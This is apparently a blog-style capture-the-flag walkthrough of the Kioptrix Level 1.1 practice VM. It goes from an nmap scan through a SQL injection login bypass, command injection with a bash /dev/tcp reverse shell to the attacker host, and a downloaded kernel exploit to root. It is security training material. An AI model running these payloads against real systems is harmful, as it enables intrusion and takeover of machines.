Kioptrix Level 1.1 (#2)
Hello, today I’ll share how to break second instance of Kioptrix.
From Authors description:
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
Nmap scan shows a couple of services:
# nmap 192.168.0.104 -sT -sV -O -n -- snip -- PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.52 ((CentOS)) 111/tcp open rpcbind 2 (RPC #100000) 443/tcp open ssl/https? 631/tcp open ipp CUPS 1.1 3306/tcp open mysql MySQL (unauthorized) -- snip --
I’ll how attacker can easly use HTTP service to gain reverse shell.
SQL Injection authentication bypass
Opening main HTTP page shows a login page:
Inserting values like
username: administrator password: ' OR 'a'='a
Makes the SQL condition always true and therefore creates a session without actual credentials.
After logging in we are presented with another form:
It seems to be a simple tool running ping on given IP. I make an educated guess that it simply runs ping thorugh bash command. So injecting another command after a semicolon should also be executed:
Having confirmed the vulnerability I incject a simple reverse shell:
; bash -i >& /dev/tcp/192.168.0.105/443 0>&1
That should return a shell to attackers machine:
# nc -nvlp 443 listening on [any] 443 ... connect to [192.168.0.105] from (UNKNOWN) [192.168.0.104] 32770 bash: no job control in this shell bash-3.00$ whoami apache
Server seems to be running under an outdated system version:
# nc -nvlp 443 bash-3.00$ uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Kernel version 2.6.9-55.EL is vulnerable to a privlege escalation vulnerability. I download source code to attackers machine. Then I download, compile and run the exploit on the the victim:
bash-3.00$ cd /tmp bash-3.00$ wget 192.168.0.105/9542.c -- snip -- 12:44:16 (360.08 MB/s) - '9542.c' saved [2643/2643] bash-3.00$ gcc 9542.c -o 9542 9542.c:109:28: warning: no newline at end of file sh-3.00# python -c 'import pty; pty.spawn("/bin/sh")' sh-3.00# ./9542 ./9542 [-] check ur uid sh-3.00# id id uid=0(root) gid=0(root) groups=48(apache)
Time for root dance :)